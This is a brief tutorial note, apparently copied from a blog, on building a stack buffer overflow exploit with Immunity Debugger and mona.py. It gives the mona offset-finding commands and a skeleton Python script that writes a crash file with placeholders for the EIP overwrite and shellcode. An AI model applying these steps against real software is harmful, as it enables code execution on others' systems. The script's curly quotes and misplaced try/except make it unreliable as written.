Writing Exploits with Mona

Sourcehttp://blog.pusheax.com/2013/03/exploit-writing-stack-based-buffer.html

0. ImmunityDebugger
1. !mona update
2. Attach to the process
2. !mona config -set workingfolder c:\logs\%p
3. !mona pattern_create 2000
!mona pattern_offset 37694136  (EIP value — during the crash)
5. Modify the script

print “Creating exploit.”
f=open(“crash-me.PLF”,”w”)
#Create the file
push=”A”*260 #Found by mona.py
eip =”BBBB” #more 4 bytes to overwrite EIP
junk=”C”*1736 #Later will replace this with real shellcode
try:
  f.write(push+eip+junk)
  f.close()
print “File created”
except:
  print “File cannot be created”

Our Next goal will be:
1. Replacing “BBBB” with valid pointer (Pointer to esp and esp will hold shellcode)
2. Solving an(CCCC… after EIP) easy problem.
3. Replacing “CCCCCC…” with real shellcode.

6. !mona jmp -r esp -o 

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s